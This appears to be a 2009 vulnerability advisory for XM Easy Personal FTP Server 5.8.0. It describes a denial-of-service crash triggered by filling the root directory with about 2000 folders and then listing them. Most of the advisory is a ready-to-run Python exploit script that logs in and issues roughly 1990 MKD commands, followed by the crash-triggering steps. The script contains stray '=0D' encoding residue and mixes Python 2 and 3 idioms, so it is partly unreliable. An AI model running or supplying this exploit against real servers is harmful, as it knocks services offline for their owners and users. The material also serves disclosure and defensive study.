Date of Discovery: 24-Nov-2009

Credits: leinakesi[at]gmail.com

Vendor: Dxmsoft
*******************************************************************************
Affected:

XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
*******************************************************************************
Overview:

XM Easy Personal FTP Server fails to handle more than 2000 files or folders in the root directory.
*******************************************************************************
Details:

If you can log on to the server, take the following steps and the server will crash, leading to a denial of service.

1. Upload 2000 files or folders.
2. Close the current connection.
3. Use an FTP client to reconnect to the server:
user ...
pass ...
port ...
list ...
crash!!!!!!
*******************************************************************************
Exploit example:

1. Upload 2000 folders.
#!/usr/bin/python=0D
import socket=0D
import sys=0D
=0D
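def Usage():
    """Print the command-line synopsis and an example invocation to stdout.

    The script takes exactly three positional arguments: the FTP server
    host, the username and the password.  The original synopsis line
    omitted the argument names, so only the example line showed them.
    """
    print("Usage: ./expl.py <host> <username> <password>\n")
    print("Example:./expl.py 192.168.48.183 anonymous anonymous\n")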
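# Argument handling: exactly three positional arguments are required
# (host, username, password); anything else prints the synopsis and exits.
if len(sys.argv) != 4:
    Usage()
    sys.exit(1)

hostname = sys.argv[1]
username = sys.argv[2]
passwd = sys.argv[3]

# Directory-name prefixes and the per-prefix name length range.  Each
# prefix yields names of length 1..199, so the session issues
# 10 * 199 = 1990 MKD commands in total.  (The original file repeated one
# identical loop per prefix letter.)  From a monitoring standpoint this is
# the observable signature: one authenticated session issuing roughly two
# thousand MKD commands back to back.
PREFIXES = "abcdefghij"
MAX_NAME_LEN = 200


def _send_cmd(sock, line):
    """Send one FTP command line, echo it, and return the raw reply.

    The reply is read with a single recv(1024), as in the original; this
    is not guaranteed to be a complete reply line, it is only logged.
    """
    sock.send(line)
    print("[-] " + line)
    reply = sock.recv(1024)
    print("[+] " + reply + "\r\n")
    return reply


sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((hostname, 21))
except socket.error:
    # Narrowed from a bare except so Ctrl-C and programming errors are not
    # reported as a connection failure; the socket is released before exit.
    print("Connection error!")
    sock.close()
    sys.exit(1)

try:
    sock.recv(1024)                   # server banner
    sock.send("user %s\r\n" % username)
    sock.recv(1024)                   # reply to USER
    sock.send("pass %s\r\n" % passwd)
    # The original never read the PASS reply, so every "[+]" line logged
    # the reply to the *previous* command.  Reading it here keeps each
    # logged reply paired with the command that produced it.
    sock.recv(1024)
    for prefix in PREFIXES:
        for length in range(1, MAX_NAME_LEN):
            _send_cmd(sock, "mkd " + prefix * length + "\r\n")
finally:
    # Always release the socket, also when the server drops the
    # connection mid-session and send/recv raise.
    sock.close()
sys.exit(0)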
=0D
2. Use an FTP client to reconnect to the server.
For example:
start -> run -> cmd -> ftp 127.0.0.1 -> ***** -> ***** -> dir
